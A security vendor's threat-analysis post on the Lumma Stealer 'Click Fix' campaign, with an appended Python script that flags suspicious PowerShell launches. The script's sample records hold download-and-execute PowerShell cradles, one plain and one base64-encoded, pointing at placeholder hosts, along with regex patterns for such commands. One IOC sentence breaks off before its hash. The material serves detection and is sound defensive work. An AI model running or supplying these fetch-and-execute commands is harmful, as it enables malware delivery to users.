Lumma Stealer Click Fix Attack: Threat Analysis and Mitigation for Windows Systems
- Rescana
- Mar 9
- 3 min read

Detailed Analysis Report on Lumma Stealer "Click Fix" Style Attack
Executive Summary
The Lumma Stealer is an advanced information-stealing malware delivered through a "Click Fix" style attack. This approach relies on social engineering to deceive users into executing harmful PowerShell scripts under the guise of legitimate Google Meet and Windows Update interfaces. The malware is marketed mainly as a service (Malware-as-a-Service, MaaS) on Russian-speaking underground platforms. Lumma Stealer has been implicated in a variety of campaigns globally, targeting sensitive data including cryptocurrency wallets, browser information, email credentials, and financial data.
Impact Assessment
The Lumma Stealer "Click Fix" attack has significant implications for users and organizations. This malware is adept at bypassing traditional security measures through its use of legitimate-looking interfaces and sophisticated evasion tactics. The primary targets of this malware are Windows operating systems, particularly versions ranging from Windows 7 to 11. Additionally, the malware poses a risk to popular web browsers like Google Chrome, Microsoft Edge, and Mozilla Firefox, as well as cryptocurrency wallets and browser extensions like Metamask and Authenticator. Financial sector organizations and individuals involved in cryptocurrency transactions are particularly vulnerable.
Threat Actor Details
The Lumma Stealer is attributed to developers using aliases such as "Shamel" and "Lumma". The malware, written in C, utilizes the ChaCha20 cipher for encrypting its configurations, enhancing its stealth. The threat actors employ advanced delivery mechanisms and social engineering strategies to propagate the malware, indicating a high level of sophistication and resources.
Technical Details and IOCs
The attack utilizes fake verification interfaces that mimic services like Google Meet to trick users into executing PowerShell commands. This involves clipboard manipulation, where malicious scripts are placed into the clipboard for users to execute via the Windows Run prompt. Once executed, the PowerShell commands download additional scripts from malicious domains. Indicators of Compromise (IOCs) include a malicious PowerShell script with SHA256 hash
Affected Systems and Services
Lumma Stealer targets Windows operating systems, specifically versions from Windows 7 to 11. It affects various web browsers including Google Chrome, Microsoft Edge, and Mozilla Firefox, in addition to cryptocurrency wallets like Binance and Ethereum. Browser extensions for crypto wallets and 2FA, such as Metamask and Authenticator, are also at risk.
Timeline of Events
The Lumma Stealer was first documented in August 2022. Since its discovery, it has been actively used in multiple campaigns across different regions. The use of fake interfaces to facilitate the attack has been a consistent tactic, demonstrating the malware's adaptability and the attackers' commitment to refining their methods.
Prioritized Mitigation Steps
Organizations should prioritize user awareness training to help individuals recognize phishing and social engineering attempts. Implementing tools to monitor PowerShell activities can help in detecting unusual behavior indicative of an attack. Network segmentation should be enforced to limit the spread of malware within an organization. Regular updates of systems and security software are crucial to protect against known vulnerabilities.
Detection Methods
Detection can be enhanced by monitoring for the specific IOCs associated with Lumma Stealer, such as the identified hashes of malicious scripts and ZIP archives. Security teams should also look for unusual PowerShell activity and network traffic directed towards the known C2 domains.
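As an added example that is not part of Rescana's report, the following Python triages process-creation records for the pattern described above: a PowerShell interpreter launched from explorer.exe (the Run prompt path), a download-and-execute cradle, a hidden window, or an encoded command that it decodes before matching. The records and the `example.invalid` domains are constructed placeholders, and the field names assume Sysmon Event ID 1 style telemetry.

```python
import base64
import re

def _enc(script):
    # PowerShell -EncodedCommand takes base64 of the UTF-16LE script text
    return base64.b64encode(script.encode("utf-16le")).decode()

# Constructed sample records (Sysmon Event ID 1 style fields), not real telemetry
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -c "iwr https://update.example.invalid/v.ps1 | iex"'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -NoProfile -EncodedCommand "
                    + _enc('Invoke-Expression (Invoke-WebRequest "https://meet.example.invalid/verify.ps1")')},
    {"ParentImage": r"C:\Program Files\Git\bin\bash.exe",      # benign developer activity
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -NoProfile -File build.ps1"},
]

INTERPRETERS = ("powershell.exe", "pwsh.exe", "mshta.exe")
CRADLE = re.compile(r"\b(iwr|irm|iex|invoke-webrequest|invoke-restmethod|invoke-expression"
                    r"|downloadstring|downloadfile)\b", re.I)
HIDDEN = re.compile(r"-w(indowstyle)?\s+h(idden)?\b", re.I)
ENCODED = re.compile(r"-e(nc|ncodedcommand|c)?\s+([A-Za-z0-9+/=]{16,})", re.I)

def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload if present, else an empty string."""
    m = ENCODED.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(2)).decode("utf-16le", errors="ignore")
    except ValueError:  # binascii.Error is a ValueError: malformed base64
        return ""

def score_event(event):
    """Count Click Fix indicators on one record; returns (score, reasons)."""
    reasons = []
    if not event["Image"].lower().endswith(INTERPRETERS):
        return 0, reasons
    cmd = event["CommandLine"]
    decoded = decode_encoded_command(cmd)
    if event["ParentImage"].lower().endswith("\\explorer.exe"):
        reasons.append("interpreter spawned by explorer.exe (Run prompt pattern)")
    if decoded:
        reasons.append("encoded command decodes to: " + decoded[:60])
    if CRADLE.search(cmd + " " + decoded):   # match on the decoded text too
        reasons.append("download-and-execute cradle")
    if HIDDEN.search(cmd):
        reasons.append("hidden window requested")
    return len(reasons), reasons

def triage(events, threshold=2):
    """Return (event, (score, reasons)) for records meeting the threshold."""
    return [(e, score_event(e)) for e in events if score_event(e)[0] >= threshold]
```

Pair the score with the C2 domains and hashes from your own indicator feed; the threshold keeps a lone encoded command from a build pipeline from alerting on its own.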
References and Advisories
For further details, refer to the following resources: GBHackers on Security's article on the Lumma Stealer attack (https://gbhackers.com/lumma-stealer-using-fake-google-meet-windows-update-sites/), Darktrace's blog on the rise of the Lumma Info-Stealer (https://darktrace.com/blog/the-rise-of-the-lumma-info-stealer), and Trend Micro's analysis of Lumma Stealer’s GitHub-based delivery (https://www.trendmicro.com/en_us/research/25/a/lumma-stealers-github-based-delivery-via-mdr.html).
About Rescana
Rescana assists organizations in managing third-party risks through its comprehensive Third Party Risk Management (TPRM) platform. By identifying vulnerabilities and potential threats in third-party partnerships, Rescana helps clients safeguard their operations against emerging cyber threats. For inquiries regarding this report or other cybersecurity concerns, please contact us at ops@rescana.com.